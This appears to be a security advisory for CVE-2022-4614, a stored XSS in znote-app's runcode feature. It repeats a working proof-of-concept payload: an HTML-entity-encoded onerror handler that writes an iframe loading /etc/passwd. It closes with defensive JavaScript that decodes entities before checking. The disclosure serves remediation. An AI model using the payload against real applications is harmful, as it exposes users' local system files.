CVE-2022-4614: XSS to LFI in Runcode Feature in znote-app

Cross-site Scripting (XSS) - Stored in GitHub repository alagrede/znote-app prior to 1.7.11.


Description

By default, the runcode feature sanitizes the "document." prefix, but the check is applied to the literal text only. If the same string is HTML-encoded as numeric character references, i.e. &#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041, the sanitizer no longer matches it. The encoded string can then be placed in an HTML tag event attribute such as onerror, where the browser decodes the references before executing the handler: <img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

POC: https://drive.google.com/file/d/1_Jh133kMAqMf8AUWrrjbOqRQpHSKlVyO/view?usp=sharing https://drive.google.com/file/d/1ek5dg4PG3rADuUPPXUOlKE6qSVGmKdZB/view?usp=sharing

Proof of Concept

<img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

Github issue: https://github.com/alagrede/znote-app/issues/73

Impact

Local OS file read via stored XSS
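As an added illustration (not code from znote-app), the following JavaScript shows why a check on the literal "document." prefix fails against numeric character references in an event-handler attribute, and a variant that decodes the attribute value the way a browser does before checking. The function names and the seven-digit zero padding of the constructed input are assumptions; removing event-handler attributes with an allowlist-based sanitizer is the more robust fix.

```javascript
// Added example, not znote-app code. Assumes the sanitizer's rule is
// "block event-handler values containing the document. prefix".

// Decode HTML numeric character references (&#100; &#0000100 &#x64;),
// with or without the trailing semicolon, as browsers do for attribute values.
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (m, num) => {
    const cp = num[0].toLowerCase() === 'x'
      ? parseInt(num.slice(1), 16)
      : parseInt(num, 10);
    return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Weak check: inspects only the raw attribute text, so encoded input passes.
function weakBlocksDocumentPrefix(attrValue) {
  return /document\./i.test(attrValue);
}

// Hardened check: normalise (decode) first, then look for the prefix.
function hardenedBlocksDocumentPrefix(attrValue) {
  return /document\./i.test(decodeNumericRefs(attrValue));
}

// Encode a string as zero-padded decimal references without semicolons,
// the form seen in the advisory, to build a constructed test input.
function encodeAsPaddedDecimal(s) {
  return Array.from(s, ch => '&#' + String(ch.codePointAt(0)).padStart(7, '0')).join('');
}

// Pull the values of on* attributes out of a snippet (simple regex scan,
// adequate for spotting the pattern; not a full HTML parser).
function eventHandlerValues(html) {
  const out = [];
  const re = /\bon[a-z]+\s*=\s*("([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[2] ?? m[3] ?? m[4]);
  return out;
}

// A note is accepted only if no event handler resolves to the blocked prefix.
function isSafeNote(html) {
  return !eventHandlerValues(html).some(hardenedBlocksDocumentPrefix);
}
```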
